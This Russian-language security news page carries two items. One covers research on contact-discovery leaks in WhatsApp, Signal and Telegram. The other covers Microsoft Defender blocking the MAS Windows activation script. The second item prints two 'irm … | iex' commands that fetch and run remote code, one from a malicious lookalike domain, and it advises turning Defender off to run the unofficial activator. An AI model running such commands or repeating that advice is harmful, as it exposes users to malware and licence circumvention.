WhatsApp, Signal, Telegram раскрывают данные миллиардов пользователей

WhatsApp, Signal, Telegram раскрывают данные миллиардов пользователей

WhatsApp, Signal, Telegram раскрывают данные миллиардов пользователей

Популярные мессенджеры для мобильных платформ раскрывают персональные данные пользователей, заявили исследователи в области кибербезопасности. А всё благодаря специальным сервисам, позволяющим находить контакты по телефонным номерам.

Сразу после установки WhatsApp пользователи могут общаться в чатах с людьми из списка контактов. Приложение просто находит нужного человека по номеру телефона.

Для этого, само собой, пользователь должен предоставить мессенджеру права на чтение списка контактов. При этом само приложение, получив такой доступ, будет регулярно загружать контакты на свои серверы и обновлять их при случае.

Исследование, проведённое недавно специалистами Secure Software Systems Group и Cryptography and Privacy Engineering Group, показало, что эти функции обнаружения контактов угрожают конфиденциальности миллиардов пользователей.

Используя совсем незначительные ресурсы, эксперты смогли провести атаки на популярные мессенджеры — WhatsApp, Signal и Telegram. В результате получилась демонстрация того, как потенциальный злоумышленник может собрать конфиденциальную информацию в огромных масштабах.

Проанализированные данные также открыли весьма любопытную статистику. Например, очень небольшое количество пользователей меняют свои настройки конфиденциальности по умолчанию. А ведь в таком виде они зачастую не могут обеспечить должную защиту данных пользователя.

Что касается Telegram, исследователи выяснили: функция поиска контактов раскрывала важную информацию даже о владельцах телефонных номеров, которые пока не регистрировались в сервисе.

«Мы настоятельно рекомендуем пользователям мессенджеров уделить внимание своим настройкам конфиденциальности. На сегодняшний день это самый лучший способ борьбы с продемонстрированной атакой», — пишут специалисты.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru